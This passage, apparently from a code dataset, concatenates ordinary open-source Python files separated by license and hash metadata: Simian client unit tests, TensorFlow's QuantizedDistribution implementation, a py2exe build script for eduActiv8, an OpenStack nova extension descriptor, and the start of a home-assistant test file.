self.client.facter_cache_path = file_path
fake_file = self.fs.CreateFile(file_path)
fake_file.st_uid = 100
# root
with mock.patch.object(client.os, 'geteuid', return_value=0):
fake_open = mock.Mock()
self.assertEqual({}, self.client.GetFacter(open_fn=fake_open))
fake_open.assert_not_called()
# same regular user
with mock.patch.object(client.os, 'geteuid', return_value=200):
fake_open = mock.Mock()
self.assertEqual({}, self.client.GetFacter(open_fn=fake_open))
fake_open.assert_not_called()
@mock.patch.object(client.os.path, 'isfile', return_value=False)
def testGetFacterWhenCacheDoesNotExist(self, _):
"""Test GetFacter() with a nonexistent cache file."""
self.client.facter_cache_path = '/x'
self.assertEqual({}, self.client.GetFacter())
def testGetFacterWhenCachePathIsNone(self):
"""Test GetFacter() with facter_cache_path is None."""
self.client.facter_cache_path = None
self.assertEqual({}, self.client.GetFacter())
def testGetAuthTokenFromHeadersSuccess(self):
token = '%s=123; secure; httponly;' % auth.AUTH_TOKEN_COOKIE
result = self.client._GetAuthTokenFromHeaders(
{'set-cookie': 'other=value;,%s,something=else;' % token})
self.assertEqual(token, result)
def testGetAuthTokenFromHeadersMissingHeader(self):
self.assertRaises(
client.SimianClientError,
self.client._GetAuthTokenFromHeaders,
{'set-cookie': ''})
class SimianClientTest(basetest.TestCase):
"""Test SimianClient class."""
def setUp(self):
self.hostname = 'hostname'
self.port = None
self.client = client.SimianClient(self.hostname)
def testInitWithoutHostname(self):
"""Test __init__() without a hostname passed."""
user = 'foouser'
with mock.patch.object(
client.SimianClient, '_GetLoggedOnUser', return_value=user):
clienttmp = client.SimianClient()
self.assertEqual(clienttmp.hostname, client.SERVER_HOSTNAME)
self.assertEqual(clienttmp._user, user)
def testInitWithHostname(self):
"""Test __init__() with a hostname passed."""
user = 'foouser'
with mock.patch.object(
client.SimianClient, '_GetLoggedOnUser', return_value=user):
clienttmp = client.SimianClient('foo')
self.assertEqual(clienttmp.hostname, 'foo')
self.assertEqual(clienttmp._user, user)
def testInitAsRoot(self):
"""Test __init__() with a hostname passed."""
with mock.patch.object(
client.SimianClient, '_GetLoggedOnUser', return_value='root'):
self.assertRaises(client.SimianClientError, client.SimianClient)
def testIsDefaultHostClient(self):
"""Test IsDefaultHostClient()."""
self.client._default_hostname = 'foo'
self.assertEqual(self.client.IsDefaultHostClient(), 'foo')
def testSimianRequest(self):
"""Test _SimianRequest()."""
method = 'zGET'
url = '/url'
headers = {'foo': 'bar'}
output_filename = None
good_response = client.Response(status=200, body='hello there')
with mock.patch.object(
self.client, 'Do', return_value=good_response) as do_mock:
self.assertEqual(
good_response.body,
self.client._SimianRequest(method, url, headers=headers))
do_mock.assert_called_once_with(
method, url, body=None, headers=headers,
output_filename=output_filename)
def testSimianRequestWithError(self):
"""Test _SimianRequest() with an error status returned."""
method = 'zGET'
url = '/url'
headers = {'foo': 'bar'}
output_filename = None
error_response = client.Response(status=401, body='fooerror')
with mock.patch.object(
self.client, 'Do', return_value=error_response) as do_mock:
self.assertRaises(
client.SimianServerError,
self.client._SimianRequest, method, url, headers=headers)
do_mock.assert_called_once_with(
method, url, body=None, headers=headers,
output_filename=output_filename)
def GenericStubTestAndReturn(
self,
method,
method_return,
method_args,
stub_method_name, stub_method_return, *stub_args, **stub_kwargs):
"""Helper test method.
Args:
method: method, to invoke in the test
method_return: any, value to expect from method
method_args: list, arguments to send to method during test
stub_method_name: str, method name to stub out in SimianClient class
stub_method_return: any, value to return from stubbed method call
stub_args: list, args to expect when calling stub_method_name
stub_kwargs: dict, kwargs to expect when calling stub_method_name
"""
with mock.patch.object(
self.client,
stub_method_name,
return_value=stub_method_return) as m:
got_rv = method(*method_args)
self.assertEqual(got_rv, method_return)
m.assert_called_once_with(*stub_args, **stub_kwargs)
def GenericStubTest(
self,
method, method_args,
stub_method_name, *stub_args, **stub_kwargs):
"""Helper test method.
Args:
method: method, to invoke in the test
method_args: list, arguments to send to method during test
stub_method_name: str, method name to stub out in SimianClient class
stub_args: list, args to expect when calling stub_method_name
stub_kwargs: dict, kwargs to expect when calling stub_method_name
Returns:
string, 'returnval'
"""
rv = 'returnval'
return self.GenericStubTestAndReturn(
method, rv, method_args,
stub_method_name, rv, *stub_args, **stub_kwargs)
def testGetCatalog(self):
"""Test GetCatalog()."""
name = 'name'
self.GenericStubTest(
self.client.GetCatalog, [name],
'_SimianRequest', 'GET', '/catalog/%s' % name)
def testGetManifest(self):
"""Test GetManifest()."""
name = 'name'
self.GenericStubTest(
self.client.GetManifest, [name],
'_SimianRequest', 'GET', '/manifest/%s' % name)
def testGetPackage(self):
"""Test GetPackage()."""
name = 'name'
self.GenericStubTest(
self.client.GetPackage, [name],
'_SimianRequest', 'GET', '/pkgs/%s' % name, output_filename=None)
def testGetPackageInfo(self):
"""Test GetPackageInfo()."""
filename = 'name.dmg'
response = mock.create_autospec(httplib.HTTPResponse)
response.body = 'hello'
self.GenericStubTestAndReturn(
self.client.GetPackageInfo,
'hello',
[filename],
'_SimianRequest',
response,
'GET', '/pkgsinfo/%s' % filename, full_response=True)
def testGetPackageInfoWhenHash(self):
"""Test GetPackageInfo()."""
filename = 'name.dmg'
response = mock.create_autospec(httplib.HTTPResponse)
response.body = 'body'
response.headers = {'x-pkgsinfo-hash': 'hash'}
self.GenericStubTestAndReturn(
self.client.GetPackageInfo, ('hash', 'body'),
[filename, True],
'_SimianRequest',
response,
'GET', '/pkgsinfo/%s?hash=1' % filename, full_response=True)
def testDownloadPackage(self):
"""Test DownloadPackage()."""
filename = 'foo'
self.GenericStubTest(
self.client.DownloadPackage,
[filename],
'_SimianRequest', 'GET',
'/pkgs/%s' % filename, output_filename=filename)
def testPostReport(self):
"""Test PostReport()."""
report_type = 'foo'
params = {'bar': 1}
url = '/reports'
body = '_report_type=%s&%s' % (
report_type,
client.urllib.urlencode(params, doseq=True))
self.GenericStubTest(
self.client.PostReport, [report_type, params],
'_SimianRequest', 'POST', url, body)
def testPostReportWhenFeedback(self):
"""Test PostReport()."""
report_type = 'foo'
params = {'bar': 1}
url = '/reports'
body = '_report_type=%s&%s&_feedback=1' % (
report_type,
client.urllib.urlencode(params, doseq=True))
self.GenericStubTest(
self.client.PostReport, [report_type, params, True],
'_SimianRequest', 'POST', url, body)
def testPostReportBody(self):
"""Test PostReportBody()."""
url = '/reports'
body = 'foo'
self.GenericStubTest(
self.client.PostReportBody, [body],
'_SimianRequest', 'POST', url, body)
def testPostReportBodyWhenFeedback(self):
"""Test PostReportBody()."""
url = '/reports'
body = 'foo'
body_with_feedback = 'foo&_feedback=1'
self.GenericStubTest(
self.client.PostReportBody, [body, True],
'_SimianRequest', 'POST', url, body_with_feedback)
@mock.patch.object(client.os.path, 'isfile', return_value=True)
def testUploadFile(self, _):
"""Test UploadFile()."""
file_type = 'log'
file_name = 'file.log'
file_path = 'path/to/' + file_name
url = '/uploadfile/%s/%s' % (file_type, file_name)
mock_file = mock.create_autospec(file)
mock_open = mock.Mock(return_value=mock_file)
with mock.patch.object(self.client, 'Do') as mock_do:
self.client.UploadFile(file_path, file_type, _open=mock_open)
mock_do.assert_called_once_with('PUT', url, mock_file)
@mock.patch.object(client.logging, 'error', autospec=True)
@mock.patch.object(client.os.path, 'isfile', return_value=False)
def testUploadFileWhenLogNotFound(self, mock_isfile, mock_logging_error):
"""Test UploadFile() when the file is not found."""
file_path = 'path/to/file.log'
self.client.UploadFile(file_path, 'foo-file-type')
mock_logging_error.assert_called_once_with(
'UploadFile file not found: %s', file_path)
mock_isfile.assert_called_once_with(file_path)
class SimianAuthClientTest(basetest.TestCase):
"""Test SimianAuthClient class."""
def setUp(self):
super(SimianAuthClientTest, self).setUp()
self.pac = client.SimianAuthClient()
def testGetAuthToken(self):
"""Test GetAuthToken()."""
with mock.patch.object(self.pac, 'DoSimianAuth'):
self.pac._cookie_token = 'token'
self.assertEqual(self.pac.GetAuthToken(), 'token')
def testLogoutAuthToken(self):
"""Test LogoutAuthToken()."""
url = '/auth?logout=True'
with mock.patch.object(self.pac, '_SimianRequest', return_value='ok'):
self.assertTrue(self.pac.LogoutAuthToken())
self.pac._SimianRequest.assert_called_once_with('GET', url)
def testLogoutAuthTokenWhenFail(self):
"""Test LogoutAuthToken()."""
url = '/auth?logout=True'
with mock.patch.object(
self.pac, '_SimianRequest', side_effect=client.SimianServerError):
self.assertFalse(self.pac.LogoutAuthToken())
self.pac._SimianRequest.assert_called_once_with('GET', url)
logging.basicConfig(filename='/dev/null')
def main(unused_argv):
basetest.main()
if __name__ == '__main__':
app.run()
| apache-2.0 | 469,666,702,062,268,740 | 32.770227 | 80 | 0.669526 | false |
alsrgv/tensorflow | tensorflow/contrib/distributions/python/ops/quantized_distribution.py | 22 | 20681 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Quantized distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import distribution as distributions
from tensorflow.python.ops.distributions import util as distribution_util
from tensorflow.python.util import deprecation
__all__ = ["QuantizedDistribution"]
@deprecation.deprecated(
"2018-10-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.contrib.distributions`.",
warn_once=True)
def _logsum_expbig_minus_expsmall(big, small):
"""Stable evaluation of `Log[exp{big} - exp{small}]`.
To work correctly, we should have the pointwise relation: `small <= big`.
Args:
big: Floating-point `Tensor`
small: Floating-point `Tensor` with same `dtype` as `big` and broadcastable
shape.
Returns:
`Tensor` of same `dtype` of `big` and broadcast shape.
"""
with ops.name_scope("logsum_expbig_minus_expsmall", values=[small, big]):
return math_ops.log(1. - math_ops.exp(small - big)) + big
_prob_base_note = """
For whole numbers `y`,
```
P[Y = y] := P[X <= low], if y == low,
:= P[X > high - 1], y == high,
:= 0, if j < low or y > high,
:= P[y - 1 < X <= y], all other y.
```
"""
_prob_note = _prob_base_note + """
The base distribution's `cdf` method must be defined on `y - 1`. If the
base distribution has a `survival_function` method, results will be more
accurate for large values of `y`, and in this case the `survival_function` must
also be defined on `y - 1`.
"""
_log_prob_note = _prob_base_note + """
The base distribution's `log_cdf` method must be defined on `y - 1`. If the
base distribution has a `log_survival_function` method results will be more
accurate for large values of `y`, and in this case the `log_survival_function`
must also be defined on `y - 1`.
"""
_cdf_base_note = """
For whole numbers `y`,
```
cdf(y) := P[Y <= y]
= 1, if y >= high,
= 0, if y < low,
= P[X <= y], otherwise.
```
Since `Y` only has mass at whole numbers, `P[Y <= y] = P[Y <= floor(y)]`.
This dictates that fractional `y` are first floored to a whole number, and
then above definition applies.
"""
_cdf_note = _cdf_base_note + """
The base distribution's `cdf` method must be defined on `y - 1`.
"""
_log_cdf_note = _cdf_base_note + """
The base distribution's `log_cdf` method must be defined on `y - 1`.
"""
_sf_base_note = """
For whole numbers `y`,
```
survival_function(y) := P[Y > y]
= 0, if y >= high,
= 1, if y < low,
= P[X <= y], otherwise.
```
Since `Y` only has mass at whole numbers, `P[Y <= y] = P[Y <= floor(y)]`.
This dictates that fractional `y` are first floored to a whole number, and
then above definition applies.
"""
_sf_note = _sf_base_note + """
The base distribution's `cdf` method must be defined on `y - 1`.
"""
_log_sf_note = _sf_base_note + """
The base distribution's `log_cdf` method must be defined on `y - 1`.
"""
class QuantizedDistribution(distributions.Distribution):
"""Distribution representing the quantization `Y = ceiling(X)`.
#### Definition in Terms of Sampling
```
1. Draw X
2. Set Y <-- ceiling(X)
3. If Y < low, reset Y <-- low
4. If Y > high, reset Y <-- high
5. Return Y
```
#### Definition in Terms of the Probability Mass Function
Given scalar random variable `X`, we define a discrete random variable `Y`
supported on the integers as follows:
```
P[Y = j] := P[X <= low], if j == low,
:= P[X > high - 1], j == high,
:= 0, if j < low or j > high,
:= P[j - 1 < X <= j], all other j.
```
Conceptually, without cutoffs, the quantization process partitions the real
line `R` into half open intervals, and identifies an integer `j` with the
right endpoints:
```
R = ... (-2, -1](-1, 0](0, 1](1, 2](2, 3](3, 4] ...
j = ... -1 0 1 2 3 4 ...
```
`P[Y = j]` is the mass of `X` within the `jth` interval.
If `low = 0`, and `high = 2`, then the intervals are redrawn
and `j` is re-assigned:
```
R = (-infty, 0](0, 1](1, infty)
j = 0 1 2
```
`P[Y = j]` is still the mass of `X` within the `jth` interval.
#### Examples
We illustrate a mixture of discretized logistic distributions
[(Salimans et al., 2017)][1]. This is used, for example, for capturing 16-bit
audio in WaveNet [(van den Oord et al., 2017)][2]. The values range in
a 1-D integer domain of `[0, 2**16-1]`, and the discretization captures
`P(x - 0.5 < X <= x + 0.5)` for all `x` in the domain excluding the endpoints.
The lowest value has probability `P(X <= 0.5)` and the highest value has
probability `P(2**16 - 1.5 < X)`.
Below we assume a `wavenet` function. It takes as `input` right-shifted audio
samples of shape `[..., sequence_length]`. It returns a real-valued tensor of
shape `[..., num_mixtures * 3]`, i.e., each mixture component has a `loc` and
`scale` parameter belonging to the logistic distribution, and a `logits`
parameter determining the unnormalized probability of that component.
```python
import tensorflow_probability as tfp
tfd = tfp.distributions
tfb = tfp.bijectors
net = wavenet(inputs)
loc, unconstrained_scale, logits = tf.split(net,
num_or_size_splits=3,
axis=-1)
scale = tf.nn.softplus(unconstrained_scale)
# Form mixture of discretized logistic distributions. Note we shift the
# logistic distribution by -0.5. This lets the quantization capture "rounding"
# intervals, `(x-0.5, x+0.5]`, and not "ceiling" intervals, `(x-1, x]`.
discretized_logistic_dist = tfd.QuantizedDistribution(
distribution=tfd.TransformedDistribution(
distribution=tfd.Logistic(loc=loc, scale=scale),
bijector=tfb.AffineScalar(shift=-0.5)),
low=0.,
high=2**16 - 1.)
mixture_dist = tfd.MixtureSameFamily(
mixture_distribution=tfd.Categorical(logits=logits),
components_distribution=discretized_logistic_dist)
neg_log_likelihood = -tf.reduce_sum(mixture_dist.log_prob(targets))
train_op = tf.train.AdamOptimizer().minimize(neg_log_likelihood)
```
After instantiating `mixture_dist`, we illustrate maximum likelihood by
calculating its log-probability of audio samples as `target` and optimizing.
#### References
[1]: Tim Salimans, Andrej Karpathy, Xi Chen, and Diederik P. Kingma.
PixelCNN++: Improving the PixelCNN with discretized logistic mixture
likelihood and other modifications.
_International Conference on Learning Representations_, 2017.
https://arxiv.org/abs/1701.05517
[2]: Aaron van den Oord et al. Parallel WaveNet: Fast High-Fidelity Speech
Synthesis. _arXiv preprint arXiv:1711.10433_, 2017.
https://arxiv.org/abs/1711.10433
"""
@deprecation.deprecated(
"2018-10-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.contrib.distributions`.",
warn_once=True)
def __init__(self,
distribution,
low=None,
high=None,
validate_args=False,
name="QuantizedDistribution"):
"""Construct a Quantized Distribution representing `Y = ceiling(X)`.
Some properties are inherited from the distribution defining `X`. Example:
`allow_nan_stats` is determined for this `QuantizedDistribution` by reading
the `distribution`.
Args:
distribution: The base distribution class to transform. Typically an
instance of `Distribution`.
low: `Tensor` with same `dtype` as this distribution and shape
able to be added to samples. Should be a whole number. Default `None`.
If provided, base distribution's `prob` should be defined at
`low`.
high: `Tensor` with same `dtype` as this distribution and shape
able to be added to samples. Should be a whole number. Default `None`.
If provided, base distribution's `prob` should be defined at
`high - 1`.
`high` must be strictly greater than `low`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
name: Python `str` name prefixed to Ops created by this class.
Raises:
TypeError: If `dist_cls` is not a subclass of
`Distribution` or continuous.
NotImplementedError: If the base distribution does not implement `cdf`.
"""
parameters = dict(locals())
values = (
list(distribution.parameters.values()) +
[low, high])
with ops.name_scope(name, values=values) as name:
self._dist = distribution
if low is not None:
low = ops.convert_to_tensor(low, name="low")
if high is not None:
high = ops.convert_to_tensor(high, name="high")
check_ops.assert_same_float_dtype(
tensors=[self.distribution, low, high])
# We let QuantizedDistribution access _graph_parents since this class is
# more like a baseclass.
graph_parents = self._dist._graph_parents # pylint: disable=protected-access
checks = []
if validate_args and low is not None and high is not None:
message = "low must be strictly less than high."
checks.append(
check_ops.assert_less(
low, high, message=message))
self._validate_args = validate_args # self._check_integer uses this.
with ops.control_dependencies(checks if validate_args else []):
if low is not None:
self._low = self._check_integer(low)
graph_parents += [self._low]
else:
self._low = None
if high is not None:
self._high = self._check_integer(high)
graph_parents += [self._high]
else:
self._high = None
super(QuantizedDistribution, self).__init__(
dtype=self._dist.dtype,
reparameterization_type=distributions.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=self._dist.allow_nan_stats,
parameters=parameters,
graph_parents=graph_parents,
name=name)
@property
def distribution(self):
"""Base distribution, p(x)."""
return self._dist
@property
def low(self):
"""Lowest value that quantization returns."""
return self._low
@property
def high(self):
"""Highest value that quantization returns."""
return self._high
def _batch_shape_tensor(self):
return self.distribution.batch_shape_tensor()
def _batch_shape(self):
return self.distribution.batch_shape
def _event_shape_tensor(self):
return self.distribution.event_shape_tensor()
def _event_shape(self):
return self.distribution.event_shape
def _sample_n(self, n, seed=None):
low = self._low
high = self._high
with ops.name_scope("transform"):
n = ops.convert_to_tensor(n, name="n")
x_samps = self.distribution.sample(n, seed=seed)
ones = array_ops.ones_like(x_samps)
# Snap values to the intervals (j - 1, j].
result_so_far = math_ops.ceil(x_samps)
if low is not None:
result_so_far = array_ops.where(result_so_far < low,
low * ones, result_so_far)
if high is not None:
result_so_far = array_ops.where(result_so_far > high,
high * ones, result_so_far)
return result_so_far
@distribution_util.AppendDocstring(_log_prob_note)
def _log_prob(self, y):
if not hasattr(self.distribution, "_log_cdf"):
raise NotImplementedError(
"'log_prob' not implemented unless the base distribution implements "
"'log_cdf'")
y = self._check_integer(y)
try:
return self._log_prob_with_logsf_and_logcdf(y)
except NotImplementedError:
return self._log_prob_with_logcdf(y)
def _log_prob_with_logcdf(self, y):
return _logsum_expbig_minus_expsmall(self.log_cdf(y), self.log_cdf(y - 1))
def _log_prob_with_logsf_and_logcdf(self, y):
"""Compute log_prob(y) using log survival_function and cdf together."""
# There are two options that would be equal if we had infinite precision:
# Log[ sf(y - 1) - sf(y) ]
# = Log[ exp{logsf(y - 1)} - exp{logsf(y)} ]
# Log[ cdf(y) - cdf(y - 1) ]
# = Log[ exp{logcdf(y)} - exp{logcdf(y - 1)} ]
logsf_y = self.log_survival_function(y)
logsf_y_minus_1 = self.log_survival_function(y - 1)
logcdf_y = self.log_cdf(y)
logcdf_y_minus_1 = self.log_cdf(y - 1)
# Important: Here we use select in a way such that no input is inf, this
# prevents the troublesome case where the output of select can be finite,
# but the output of grad(select) will be NaN.
# In either case, we are doing Log[ exp{big} - exp{small} ]
# We want to use the sf items precisely when we are on the right side of the
# median, which occurs when logsf_y < logcdf_y.
big = array_ops.where(logsf_y < logcdf_y, logsf_y_minus_1, logcdf_y)
small = array_ops.where(logsf_y < logcdf_y, logsf_y, logcdf_y_minus_1)
return _logsum_expbig_minus_expsmall(big, small)
@distribution_util.AppendDocstring(_prob_note)
def _prob(self, y):
if not hasattr(self.distribution, "_cdf"):
raise NotImplementedError(
"'prob' not implemented unless the base distribution implements "
"'cdf'")
y = self._check_integer(y)
try:
return self._prob_with_sf_and_cdf(y)
except NotImplementedError:
return self._prob_with_cdf(y)
def _prob_with_cdf(self, y):
return self.cdf(y) - self.cdf(y - 1)
def _prob_with_sf_and_cdf(self, y):
# There are two options that would be equal if we had infinite precision:
# sf(y - 1) - sf(y)
# cdf(y) - cdf(y - 1)
sf_y = self.survival_function(y)
sf_y_minus_1 = self.survival_function(y - 1)
cdf_y = self.cdf(y)
cdf_y_minus_1 = self.cdf(y - 1)
# sf_prob has greater precision iff we're on the right side of the median.
return array_ops.where(
sf_y < cdf_y, # True iff we're on the right side of the median.
sf_y_minus_1 - sf_y,
cdf_y - cdf_y_minus_1)
@distribution_util.AppendDocstring(_log_cdf_note)
def _log_cdf(self, y):
low = self._low
high = self._high
# Recall the promise:
# cdf(y) := P[Y <= y]
# = 1, if y >= high,
# = 0, if y < low,
# = P[X <= y], otherwise.
# P[Y <= j] = P[floor(Y) <= j] since mass is only at integers, not in
# between.
j = math_ops.floor(y)
result_so_far = self.distribution.log_cdf(j)
# Broadcast, because it's possible that this is a single distribution being
# evaluated on a number of samples, or something like that.
j += array_ops.zeros_like(result_so_far)
# Re-define values at the cutoffs.
if low is not None:
neg_inf = -np.inf * array_ops.ones_like(result_so_far)
result_so_far = array_ops.where(j < low, neg_inf, result_so_far)
if high is not None:
result_so_far = array_ops.where(j >= high,
array_ops.zeros_like(result_so_far),
result_so_far)
return result_so_far
@distribution_util.AppendDocstring(_cdf_note)
def _cdf(self, y):
low = self._low
high = self._high
# Recall the promise:
# cdf(y) := P[Y <= y]
# = 1, if y >= high,
# = 0, if y < low,
# = P[X <= y], otherwise.
# P[Y <= j] = P[floor(Y) <= j] since mass is only at integers, not in
# between.
j = math_ops.floor(y)
# P[X <= j], used when low < X < high.
result_so_far = self.distribution.cdf(j)
# Broadcast, because it's possible that this is a single distribution being
# evaluated on a number of samples, or something like that.
j += array_ops.zeros_like(result_so_far)
# Re-define values at the cutoffs.
if low is not None:
result_so_far = array_ops.where(j < low,
array_ops.zeros_like(result_so_far),
result_so_far)
if high is not None:
result_so_far = array_ops.where(j >= high,
array_ops.ones_like(result_so_far),
result_so_far)
return result_so_far
@distribution_util.AppendDocstring(_log_sf_note)
def _log_survival_function(self, y):
low = self._low
high = self._high
# Recall the promise:
# survival_function(y) := P[Y > y]
# = 0, if y >= high,
# = 1, if y < low,
# = P[X > y], otherwise.
# P[Y > j] = P[ceiling(Y) > j] since mass is only at integers, not in
# between.
j = math_ops.ceil(y)
# P[X > j], used when low < X < high.
result_so_far = self.distribution.log_survival_function(j)
# Broadcast, because it's possible that this is a single distribution being
# evaluated on a number of samples, or something like that.
j += array_ops.zeros_like(result_so_far)
# Re-define values at the cutoffs.
if low is not None:
result_so_far = array_ops.where(j < low,
array_ops.zeros_like(result_so_far),
result_so_far)
if high is not None:
neg_inf = -np.inf * array_ops.ones_like(result_so_far)
result_so_far = array_ops.where(j >= high, neg_inf, result_so_far)
return result_so_far
@distribution_util.AppendDocstring(_sf_note)
def _survival_function(self, y):
low = self._low
high = self._high
# Recall the promise:
# survival_function(y) := P[Y > y]
# = 0, if y >= high,
# = 1, if y < low,
# = P[X > y], otherwise.
# P[Y > j] = P[ceiling(Y) > j] since mass is only at integers, not in
# between.
j = math_ops.ceil(y)
# P[X > j], used when low < X < high.
result_so_far = self.distribution.survival_function(j)
# Broadcast, because it's possible that this is a single distribution being
# evaluated on a number of samples, or something like that.
j += array_ops.zeros_like(result_so_far)
# Re-define values at the cutoffs.
if low is not None:
result_so_far = array_ops.where(j < low,
array_ops.ones_like(result_so_far),
result_so_far)
if high is not None:
result_so_far = array_ops.where(j >= high,
array_ops.zeros_like(result_so_far),
result_so_far)
return result_so_far
def _check_integer(self, value):
with ops.name_scope("check_integer", values=[value]):
value = ops.convert_to_tensor(value, name="value")
if not self.validate_args:
return value
dependencies = [distribution_util.assert_integer_form(
value, message="value has non-integer components.")]
return control_flow_ops.with_dependencies(dependencies, value)
| apache-2.0 | 6,102,863,444,865,605,000 | 34.231687 | 83 | 0.6138 | false |
imiolek-ireneusz/eduActiv8 | eduactiv82exe.py | 1 | 6732 | # -*- coding: utf8 -*-
# This will create a dist directory containing the executable file, all the data
# directories. All Libraries will be bundled in executable file.
#
# Run the build process by entering 'pygame2exe.py' or
# 'python pygame2exe.py' in a console prompt.
#
# To build exe, python, pygame, and py2exe have to be installed. After
# building exe none of this libraries are needed.
# Please Note have a backup file in a different directory as if it crashes you
# will loose it all!(I lost 6 months of work because I did not do this)
# http://pygame.org/wiki/Pygame2exe
try:
from distutils.core import setup
import py2exe, pygame
from modulefinder import Module
import glob, fnmatch
import sys, os, shutil
import operator
import appdirs
import packaging
except ImportError, message:
raise SystemExit, "Unable to load module. %s" % message
# hack which fixes the pygame mixer and pygame font
origIsSystemDLL = py2exe.build_exe.isSystemDLL # save the orginal before we edit it
def isSystemDLL(pathname):
# checks if the freetype and ogg dll files are being included
if os.path.basename(pathname).lower() in (
"libfreetype-6.dll", "libogg-0.dll", "sdl_ttf.dll"): # "sdl_ttf.dll" added by arit.
return 0
return origIsSystemDLL(pathname) # return the orginal function
py2exe.build_exe.isSystemDLL = isSystemDLL # override the default function with this one
class pygame2exe(
py2exe.build_exe.py2exe): # This hack make sure that pygame default font is copied: no need to modify code for specifying default font
def copy_extensions(self, extensions):
# Get pygame default font
pygamedir = os.path.split(pygame.base.__file__)[0]
pygame_default_font = os.path.join(pygamedir, pygame.font.get_default_font())
# Add font to list of extension to be copied
extensions.append(Module("pygame.font", pygame_default_font))
py2exe.build_exe.py2exe.copy_extensions(self, extensions)
class BuildExe:
def __init__(self):
# Name of starting .py
self.script = "eduactiv8.py"
# Name of program
self.project_name = "eduActiv8"
# Project url
self.project_url = "https://www.eduactiv8.org"
# Version of program
self.project_version = "1.0"
# License of the program
self.license = "GPL3"
# Auhor of program
self.author_name = "Ireneusz Imiolek"
self.author_email = "[email protected]"
self.copyright = "Copyright (c) 2012-2019 Ireneusz Imiolek"
# Description
self.project_description = "eduActiv8 - Educational Activities for Kids"
# Icon file (None will use pygame default icon)
self.icon_file = os.path.join("res", "icon", "eduactiv8.ico")
# Extra files/dirs copied to game
self.extra_datas = ["classes", "game_boards", "i18n", "locale", "res", "xml"]
# Extra/excludes python modules
self.extra_modules = ['appdirs', 'packaging']
# showed missing in result compilation
self.exclude_modules = []
# DLL Excludes
self.exclude_dll = ['']
# python scripts (strings) to be included, seperated by a comma
self.extra_scripts = []
# Zip file name (None will bundle files in exe instead of zip file)
self.zipfile_name = None
# Dist directory
self.dist_dir = 'dist'
# Code from DistUtils tutorial at http://wiki.python.org/moin/Distutils/Tutorial
# Originally borrowed from wxPython's setup and config files
def opj(self, *args):
path = os.path.join(*args)
return os.path.normpath(path)
def find_data_files(self, srcdir, *wildcards, **kw):
# get a list of all files under the srcdir matching wildcards,
# returned in a format to be used for install_data
def walk_helper(arg, dirname, files):
if '.svn' in dirname:
return
names = []
lst, wildcards = arg
for wc in wildcards:
wc_name = self.opj(dirname, wc)
for f in files:
filename = self.opj(dirname, f)
if fnmatch.fnmatch(filename, wc_name) and not os.path.isdir(filename):
names.append(filename)
if names:
lst.append((dirname, names))
file_list = []
recursive = kw.get('recursive', True)
if recursive:
os.path.walk(srcdir, walk_helper, (file_list, wildcards))
else:
walk_helper((file_list, wildcards),
srcdir,
[os.path.basename(f) for f in glob.glob(self.opj(srcdir, '*'))])
return file_list
def run(self):
if os.path.isdir(self.dist_dir): # Erase previous destination dir
shutil.rmtree(self.dist_dir)
# Use the default pygame icon, if none given
if self.icon_file is None:
path = os.path.split(pygame.__file__)[0]
self.icon_file = os.path.join(path, 'pygame.ico')
# List all data files to add
extra_datas = ["__init__.py", "CHANGES.txt", "CREDITS.txt", "eduactiv8.py", "LICENSE", "README.txt"]
for data in self.extra_datas:
if os.path.isdir(data):
extra_datas.extend(self.find_data_files(data, '*'))
else:
extra_datas.append(('.', [data]))
setup(
cmdclass={'py2exe': pygame2exe},
version=self.project_version,
description=self.project_description,
name=self.project_name,
url=self.project_url,
author=self.author_name,
author_email=self.author_email,
license=self.license,
# targets to build
# console = [{
windows=[{
'script': self.script,
'icon_resources': [(0, self.icon_file)],
'copyright': self.copyright
}],
options={'py2exe': {'optimize': 2, 'bundle_files': 1, 'compressed': True,
'excludes': self.exclude_modules, 'packages': self.extra_modules,
'dll_excludes': self.exclude_dll,
'includes': self.extra_scripts}},
zipfile=self.zipfile_name,
data_files=extra_datas,
dist_dir=self.dist_dir
)
if os.path.isdir('build'): # Clean up build dir
shutil.rmtree('build')
if __name__ == '__main__':
if operator.lt(len(sys.argv), 2):
sys.argv.append('py2exe')
BuildExe().run() # Run generation
| gpl-3.0 | 4,976,437,304,179,288,000 | 34.619048 | 139 | 0.596257 | false |
ChinaMassClouds/copenstack-server | openstack/src/nova-2014.2/nova/api/openstack/compute/contrib/createserverext.py | 100 | 1156 | # Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import extensions
class Createserverext(extensions.ExtensionDescriptor):
"""Extended support to the Create Server v1.1 API."""
name = "Createserverext"
alias = "os-create-server-ext"
namespace = ("http://docs.openstack.org/compute/ext/"
"createserverext/api/v1.1")
updated = "2011-07-19T00:00:00Z"
def get_resources(self):
res = extensions.ResourceExtension('os-create-server-ext',
inherits='servers')
return [res]
| gpl-2.0 | -591,397,606,980,651,900 | 37.533333 | 78 | 0.679066 | false |
srcLurker/home-assistant | tests/components/test_input_boolean.py | 15 | 3095 | """The tests for the input_boolean component."""
# pylint: disable=protected-access
import unittest
